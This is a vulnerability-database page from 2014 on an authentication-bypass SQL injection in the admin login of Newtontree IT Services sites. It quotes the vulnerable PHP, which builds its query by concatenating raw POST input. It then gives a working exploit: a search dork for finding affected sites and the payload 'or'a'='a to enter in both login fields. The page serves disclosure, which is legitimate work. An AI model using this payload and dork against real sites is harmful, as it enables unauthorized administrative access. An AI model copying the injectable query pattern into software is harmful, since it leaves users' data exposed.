Lucene search
+L

Newtontree IT Services SQL Injection

🗓️ 31 Jan 2014 00:00:00Reported by AtT4CKxT3rR0r1STType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Newtontree IT Services SQL Injection vulnerability in authenticatio

Code
`Newtontree IT Services - Authentication Bypass Vulnerability  
===================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://newtontree.com/  
.:. Dork : "Powered by Newtontree IT Services Pvt Ltd"  
####################################################################  
  
VULNERABILITY  
##############  
/admin/index.php (line 40-47)  
  
if(isset($_POST['login'])){  
$email=$_POST['email'];  
$pwd=$_POST['pwd'];  
$sql="select * from login where email='$email' and pwd='$pwd'";  
$sql2=mysql_query($sql);  
$no=mysql_num_rows($sql2);  
if($no > 0){  
if($rec=mysql_fetch_row($sql2))  
#########  
EXPLOIT  
#########  
  
1- Go to admin [www.site.com/admin/]  
2- join code Auth Bypass in Email & Password  
3- Email: 'or'a'='a  
Password: 'or'a'='a  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jan 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
17